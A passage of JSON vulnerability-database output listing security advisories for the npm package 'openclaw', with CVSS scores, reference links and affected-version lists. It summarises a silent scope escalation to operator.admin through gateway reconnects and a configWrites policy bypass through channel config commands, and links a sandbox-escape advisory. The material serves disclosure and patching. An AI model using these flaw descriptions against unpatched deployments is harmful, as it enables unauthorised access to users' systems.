":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/"}],"url":"https://github.com/openclaw/openclaw/commit/3b9dab0ece4643a9643e6a45459f5c709d3ce320"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cwf8-44x6-32c2","reference_id":"","reference_type":"","scores":[{"value":"6.8","scorin
g_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cwf8-44x6-32c2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41397","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41397"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-unrestricted-file-sync-and-symlink-traversal","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_el
ements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-unrestricted-file-sync-and-symlink-traversal"},{"reference_url":"https://github.com/advisories/GHSA-cwf8-44x6-32c2","reference_id":"GHSA-cwf8-44x6-32c2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cwf8-44x6-32c2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCI
D-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCI
D-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41397","GHSA-cwf8-44x6-32c2"],"risk_score":4.3,"exploitability":"0.5","weighted_severity":"8.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hd4w-s3dp-nubj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91601?format=json","vulnerability_id":"VCID-hkqd-6khg-m3hj","summary":"OpenClaw: Silent privilege escalation via gateway shared-auth reconnect\n## Summary\n\nGateway local shared-auth reconnect silently widens paired device scope from operator.read to operator.admin and can reach node RCE\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nSilent local shared-auth reconnects could previously auto-approve `scope-upgrade` requests and widen a paired device from `operator.read` to `operator.admin`. 
Commit `81ebc7e0344fd19c85778e883bad45e2da972229` blocks silent reconnect scope upgrades so widened scopes require an explicit pairing approval instead of an implicit local reconnect path.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `81ebc7e0344fd19c85778e883bad45e2da972229`.\n\n## Fix Commit(s)\n\n- `81ebc7e0344fd19c85778e883bad45e2da972229`","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/81ebc7e0344fd19c85778e883bad45e2da972229","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/81ebc7e0344fd19c85778e883bad45e2da972229"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fqw4-mph7-2vr8","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fqw4-mph7-2vr8"},{"reference_url":"https://github.com/advisories/GHSA-fqw4-mph7-2vr8","reference_id":"GHSA-fqw4-mph7-2vr8","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fqw4-mph7-2vr8"}],"fixed_packages":[],"a
liases":["GHSA-fqw4-mph7-2vr8"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hkqd-6khg-m3hj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91836?format=json","vulnerability_id":"VCID-hse8-g1e9-dbay","summary":"OpenClaw: Channel commands could bypass account-scoped `configWrites` restrictions\n## Summary\nIn affected versions of `openclaw`, channel-initiated config mutations were authorized against the originating account's `configWrites` policy but did not consistently re-check the targeted account scope. An authorized sender on one account could mutate protected sibling-account configuration when the target account had `configWrites: false`.\n\n## Impact\nThis is an account-scoped policy bypass inside a single gateway deployment. Channel commands such as `/config set channels.<provider>.accounts.<id>...` and config-backed `/allowlist ... --config --account <id>` could modify protected sibling-account configuration.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe mutation path validated the origin account scope but did not consistently authorize every resolved target scope. Ambiguous collection and root writes under `channels` and `channels.<provider>.accounts` could therefore reach protected account configuration from channel command surfaces.\n\n## Fix\nOpenClaw now authorizes config mutations against both the origin scope and each resolved target scope, and it rejects ambiguous root and collection writes from channel commands unless the caller is an internal gateway client with `operator.admin`. 
The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8jhh-jcqg-mj5p","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8jhh-jcqg-mj5p"},{"reference_url":"https://github.com/advisories/GHSA-8jhh-jcqg-mj5p","reference_id":"GHSA-8jhh-jcqg-mj5p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8jhh-jcqg-mj5p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-
1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-
73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-
cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-
k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-
rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"}